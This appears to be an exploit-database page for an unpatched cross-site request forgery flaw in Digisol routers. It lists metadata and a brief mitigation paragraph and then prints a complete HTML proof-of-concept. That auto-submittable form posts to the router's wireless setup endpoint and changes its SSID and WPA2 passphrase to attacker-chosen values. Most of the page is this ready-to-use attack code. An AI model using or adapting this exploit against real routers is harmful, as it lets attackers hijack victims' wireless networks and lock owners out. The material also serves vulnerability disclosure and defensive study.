Digisol Router CSRF Exploit - Indrajith A.N

vendor:

Router

by:

Indrajith A.N

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Router

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: h:digisol:router

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Digisol Router CSRF Exploit – Indrajith A.N

This exploit is a proof-of-concept for a Cross-Site Request Forgery (CSRF) vulnerability in Digisol routers. The exploit sends a POST request to the router's web interface, which changes the router's SSID and WPA2 passphrase to 'hacked' and 'csrf1234' respectively.

Mitigation:

The best way to mitigate CSRF attacks is to use a combination of secret tokens and same-site cookies. Additionally, the use of CAPTCHAs can also help to prevent automated CSRF attacks.

Source

Exploit-DB raw data:

<html>
   Digisol Router CSRF Exploit - Indrajith A.N
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.2.1/form2WlanBasicSetup.cgi" method="POST">
      <input type="hidden" name="mode" value="0" />
      <input type="hidden" name="apssid" value="hacked" />
      <input type="hidden" name="startScanUplinkAp" value="0" />
      <input type="hidden" name="domain" value="1" />
      <input type="hidden" name="hiddenSSID" value="on" />
      <input type="hidden" name="ssid" value="hacked" />
      <input type="hidden" name="band" value="10" />
      <input type="hidden" name="chan" value="6" />
      <input type="hidden" name="chanwid" value="1" />
      <input type="hidden" name="txRate" value="0" />
      <input type="hidden" name="method&#95;cur" value="6" />
      <input type="hidden" name="method" value="6" />
      <input type="hidden" name="authType" value="2" />
      <input type="hidden" name="length" value="1" />
      <input type="hidden" name="format" value="2" />
      <input type="hidden" name="defaultTxKeyId" value="1" />
      <input type="hidden" name="key1" value="0000000000" />
      <input type="hidden" name="pskFormat" value="0" />
      <input type="hidden" name="pskValue" value="csrf1234" />
      <input type="hidden" name="checkWPS2" value="1" />
      <input type="hidden" name="save" value="Apply" />
      <input type="hidden" name="basicrates" value="15" />
      <input type="hidden" name="operrates" value="4095" />
      <input type="hidden" name="submit&#46;htm&#63;wlan&#95;basic&#46;htm" value="Send" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>